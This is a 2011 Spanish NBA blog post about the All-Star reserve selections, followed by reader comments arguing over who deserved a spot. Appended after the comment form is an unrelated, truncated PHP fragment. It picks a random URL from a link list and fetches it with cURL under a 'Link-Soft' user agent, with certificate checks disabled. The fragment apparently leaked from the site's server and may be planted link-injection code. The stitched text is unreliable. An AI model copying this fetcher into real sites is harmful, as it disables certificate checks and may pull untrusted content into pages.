Ya tenemos equipos del All-Star

04 de February de 2011 por txusma

Ayer se hicieron públicos los nombres de los reservas para el All-Star y se confirmó que el rookie Blake Griffin jugará el partido de los mayores. Su elección hace justicia a un temporada sensacional, tanto a nivel de números como de espectáculo. Hubiera sido imperdonable no aprovechar el tirón que tiene ahora mismo el jugador de los Clippers.

Junto a Blake Griffin también fueron seleccionados Pau Gasol, Tim Duncan, Dirk Nowitzki, Manu Ginobili, Deron Williams y Russell Westbrook, que jugará su primer All-Star. Estos 7 jugadores se unen a Chris Paul, Kobe Bryant, Carmelo Anthony y Kevin Durant manteniendo la incógnita de qué jugador sustituirá al leisonado Yao Ming. Evidentemente, el candidato número 1 es Kevin Love aunque Lamarcus Aldridge y Zach Randolph también tienen alguna oportunidad. Se han quedado fuera definitivamente jugadores como Monta Ellis o Lamar Odom.

En el Este, los entrenadores han corregido el hecho de que no hubiera ningún jugador de los Celtics en el quinteto inicial y lo han hecho a lo grande, escogiendo de una tacada a 4. Paul Pierce, Kevin Garnett, Ray Allen y Rajon Rondo jugarán otro partido de las estrellas. Para Garnett es el décimocuarto consecutivo, nada más y nada menos. Junto a ellos han entrado también Chris Bosh, Al Horford y Joe Johnson. ¿Excesivo premio para los Hawks? ¿Qué hay de Carlos Boozer? Recordemos que los titulares eran Derrick Rose, Dwyane Wade, Lebron James, Amare Stoudamire y Dwight Howard.

Ya no falta nada para el All Star de los Angeles 2011 a celebrar el fin de semana del 18 al 20 de Febrero. ¿Os quedaréis despiertos a verlo?

Comenta

10 comentarios a esta entrada

  1. Lassad_Balon_de_Oro dice:
    #1

    He leido por ahi que el jugador que sustituirá a Yao como titular será Nowitzki. No se si está confirmado por Stern.

      Citar

  2. Txusma dice:
    #2

    Nowiztki ya forma parte de los 7 reservas así que la cosa estará entre Love, Aldridge y Randolph y para mí el de los Wolves parte con ventaja.

      Citar

  3. Denise dice:
    #3

    Lassad (Balon de Oro jaja) se refiere a Nowitzki como Titular. Seguramente, la cosa estará entre el aleman y Pau para sustituir al chino

      Citar

  4. Hynreck dice:
    #4

    Maldito el día en el que llegó el Wifi a China…

      Citar

  5. Denise dice:
    #5

    Ya que el gobierno chino censura tanto la red, debería de censurar tambien nba.com, asi nos librariamos del chino en el all-star

      Citar

  6. Busky23 dice:
    #6

    En principio estoy en desacuerdo con 2 elecciones,Chris Bosh y Tim Duncan. El primero lleva una temporada intermitente y para nada a nivel All-Star,y sobre Tim… el nombre pesa mucho,porque por números que queréis que os diga…
    La NBA como gran empresa de entertaiment no podía desaprovechar el “efecto Griffin”,el All Star es espectáculo y el rookie eso lo encarna a la perfección.
    Seria muy injusto que no estuviera Kevin Love,a pesar de la triste temporada de los Wolves sus números son tremendos.
    Ojalá Pau sustituya al chino como titular,seria la guinda,algo que para los que llevamos viendo NBA hace mas de 15-20 años era impensable.
     

      Citar

  7. Scriers dice:
    #7

    Pues yo quería que estuviera Felton!!!

      Citar

  8. sergio dice:
    #8

    No entiendo como puede dudarse de que Duncan merece estar en el All-Star. Es el jugador mas valorado del mejor equipo de la Liga… El nombre pesa, pero su constancia tambien.

    Creo que está cantado que el suplente de Yao será Kevin Love. Al único que le doy posibilidades es a Z Bo.

    A mi la elección que más me duele es la Joe Johnson. Si querian un escolta quizas sea la mejor opcion porque no habia otro mejor en el Este. Eso si, creo que gente como Z Bo, Nash, Aldridge, Nash, Ellis, David Lee, Scola, David West, Eric Gordon o incluso su compañero Josh Smith lo merecen mas (si, se que la mayoria son de otras Conferencias, pero habia que nombrarlos)

      Citar

  9. Len Bias dice:
    #9

    Anda que no ha sido listo Joe, llevaba una temporada bastante pobre, en 2011 ha triplicado sus números y le ha valido para jugar “el partido”.

      Citar

  10. JHC dice:
    #10

    Lo Jo-Jo lo han llevado xk no abias mas escoltas y en el este lo de ser seleccionado tiene mu poko merito kizas Jhos Smith o Felton serian los unicos k esten por encima de el y en el caso de Felton taria mu parejo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>